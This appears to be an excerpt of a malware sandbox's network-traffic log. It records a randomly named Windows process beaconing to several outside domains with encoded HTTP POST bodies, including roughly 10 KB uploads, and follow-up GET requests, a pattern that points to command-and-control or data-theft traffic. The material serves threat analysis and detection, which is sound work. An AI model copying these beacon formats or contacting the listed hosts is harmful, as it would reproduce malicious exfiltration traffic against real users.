                                                                    Date: Fri, 03 Jan 2025 10:41:28 GMT
                                                                    Server: nginx
                                                                    X-Cache: BYPASS
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.4 | 50031 | 47.83.1.90 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:34.214912891 CET | 728 | OUT | POST /ctdy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.adadev.info
                                                                    Origin: http://www.adadev.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.adadev.info/ctdy/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+J9Y9odjGkV0VW9V9ipQ2zPfgUySGXZIy+g==


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.2.4 | 50032 | 47.83.1.90 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:36.765196085 CET | 748 | OUT | POST /ctdy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.adadev.info
                                                                    Origin: http://www.adadev.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.adadev.info/ctdy/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhP7TJ1byaa17ln4j5S/axpu56JHuTS7SU/M=


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.2.4 | 50033 | 47.83.1.90 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:39.317044020 CET | 10830 | OUT | POST /ctdy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.adadev.info
                                                                    Origin: http://www.adadev.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.adadev.info/ctdy/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V= [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.2.4 | 50034 | 47.83.1.90 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:41.884637117 CET | 466 | OUT | GET /ctdy/?1V=5YPKgWGFQCLPNGrM6Bx2/r3NiP9oDWgtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFTIkqAxP+kzEnb1pVMGGKhBzsI5+lu+iJts=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.adadev.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:43.461720943 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 03 Jan 2025 10:41:43 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.2.4 | 50035 | 188.114.97.3 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:48.531265020 CET | 731 | OUT | POST /8rr3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.cifasnc.info
                                                                    Origin: http://www.cifasnc.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.cifasnc.info/8rr3/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89GiAS/pe8W7KGtPD7t50Sq31NSDvlOh9EEYg==
                                                                    Jan 3, 2025 11:41:49.026953936 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:41:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:48 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    vary: Accept-Encoding,User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnjKP%2BcKgpmu%2BWe6kBGu0DkTBV0kGn9azM9D6sXqpSa%2FZTAotsCqZPkKOUobqKdhRlJ0ARFHphtAEMwd9WegtKRaczZKK2oYQLYZB657nG0GkpxdIWOTxvaSUZLQM30Kx0IA"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc260e8cef54283-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Jan 3, 2025 11:41:49.026968956 CET | 1162 | IN | Data Raw: [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.2.4 | 50036 | 188.114.97.3 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:51.082818031 CET | 751 | OUT | POST /8rr3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.cifasnc.info
                                                                    Origin: http://www.cifasnc.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.cifasnc.info/8rr3/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1pheos6s+5NDhkBLdzcuHKHCkq9XF+rePM=
                                                                    Jan 3, 2025 11:41:51.582040071 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:41:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:51 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    vary: Accept-Encoding,User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HpNq%2FzbsKZ3hZXCJ228v8boqupopXqT1vl7Vvr8Xy5%2BMuSf%2FSqr%2BviKX3jBYkHRLajwvMAZorQzwrNfCW06Rvu7fwwIElNqmrjjKmtJizQrA9l%2FvsqmuHgjObGiAydyqnal"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc260f8bc7d8c0b-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1841&rtt_var=920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Jan 3, 2025 11:41:51.582056046 CET | 1161 | IN | Data Raw: [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    35 | 192.168.2.4 | 50037 | 188.114.97.3 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:53.628392935 CET | 10833 | OUT | POST /8rr3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.cifasnc.info
                                                                    Origin: http://www.cifasnc.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.cifasnc.info/8rr3/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V= [TRUNCATED]
                                                                    Jan 3, 2025 11:41:54.160147905 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:41:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:54 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    vary: Accept-Encoding,User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajwElZ2UJYR8oEHAPmNGYNSpoGK6vM4J9J2kpNhYRTDIf0NGakl%2Fq44PboPsS9rgO0vxUaeyWSK07vJreOiOGkWNaWCDtuQVh4eCBdVh9N2UMcbcHCjZ0zNAn8R5PNSt2A2V"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc26108ba0a4364-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=7&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Jan 3, 2025 11:41:54.160170078 CET | 1161 | IN | Data Raw: [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    36 | 192.168.2.4 | 50038 | 188.114.97.3 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:41:56.167958021 CET | 467 | OUT | GET /8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.cifasnc.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:56.688426018 CET | 1220 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Fri, 03 Jan 2025 10:41:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-pingback: http://cifasnc.info/xmlrpc.php
                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    last-modified: Fri, 03 Jan 2025 10:41:56 GMT
                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    location: http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz6
                                                                    vary: User-Agent
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNAwbFLz5B9s1PiZXZOCspG%2BDXQRTEea5IOXKLWtPI9THBG78yMB3QNmHbCtWMhptCA5%2FEekfJJqPdwSPvpNpg28igeiev4zqSnHmncOA491n6%2Bxa6Y%2F0Y0a1n7tiX7mJNnA"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc261189fbd0fab-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=467&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    37 | 192.168.2.4 | 50039 | 199.59.243.228 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:09.878700972 CET | 755 | OUT | POST /dx3i/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.denture-prices.click
                                                                    Origin: http://www.denture-prices.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.denture-prices.click/dx3i/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=Q+iS5WiZOpIo/XMEb90fMbbDFKxx/CCs8kV5WGxzeyRvYLEGTTARdn5srXoMXSlsXq3dMJK1lBGZjE3S6Ol6Z0DA9GFoqmLXZ/DKdKA7kdseLoRFIGXWZkIgkT9bcdBpWfBf+JFxHewMnkc1p7+lQQ3Den+xEbPIGVYjTwzsnWH28I6WKib0h4Dn3+7qs2M+zg==
                                                                    Jan 3, 2025 11:42:10.330044031 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:10 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1146
                                                                    x-request-id: 4cb331b5-8a76-49cc-90e7-4641ef3f3b32
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                    set-cookie: parking_session=4cb331b5-8a76-49cc-90e7-4641ef3f3b32; expires=Fri, 03 Jan 2025 10:57:10 GMT; path=/
                                                                    connection: close
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:10.330059052 CET | 599 | IN
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGNiMzMxYjUtOGE3Ni00OWNjLTkwZTctNDY0MWVmM2YzYjMyIiwicGFnZV90aW1lIjoxNzM1OTAwOT


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    38 | 192.168.2.4 | 50040 | 199.59.243.228 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:12.427670002 CET | 775 | OUT | POST /dx3i/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.denture-prices.click
                                                                    Origin: http://www.denture-prices.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.denture-prices.click/dx3i/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg1vZr0GBCARcn5sl3oJZyl7Xqr/MIm1lHqZjBLS6dd7YkDO2mFqyGLXZ/DKdKURkd0eLdBFJnXVREIjtz9bYdBtWfBY+IZPHcIMnks1ovqmbQ3FD3/HMILFD3pQMmyK6X7k9O3MbT6jz4nUq5yeh1x3ohKyroDN574la172OP6FtjA=
                                                                    Jan 3, 2025 11:42:12.888844967 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:12 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1146
                                                                    x-request-id: 464fec2e-5ea9-4ed8-aa81-5f2691985585
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                    set-cookie: parking_session=464fec2e-5ea9-4ed8-aa81-5f2691985585; expires=Fri, 03 Jan 2025 10:57:12 GMT; path=/
                                                                    connection: close
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:12.888873100 CET | 599 | IN
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDY0ZmVjMmUtNWVhOS00ZWQ4LWFhODEtNWYyNjkxOTg1NTg1IiwicGFnZV90aW1lIjoxNzM1OTAwOT


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    39 | 192.168.2.4 | 50041 | 199.59.243.228 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:42:14.972227097 CET | 10857 | OUT | POST /dx3i/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.denture-prices.click
                                                                    Origin: http://www.denture-prices.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.denture-prices.click/dx3i/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V= [TRUNCATED]
                                                                    Jan 3, 2025 11:42:15.455962896 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:15 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1146
                                                                    x-request-id: 6fbf1e8b-7417-442f-8ec0-671e1381fd16
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                    set-cookie: parking_session=6fbf1e8b-7417-442f-8ec0-671e1381fd16; expires=Fri, 03 Jan 2025 10:57:15 GMT; path=/
                                                                    connection: close
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:15.455991983 CET | 599 | IN
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmZiZjFlOGItNzQxNy00NDJmLThlYzAtNjcxZTEzODFmZDE2IiwicGFnZV90aW1lIjoxNzM1OTAwOT


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
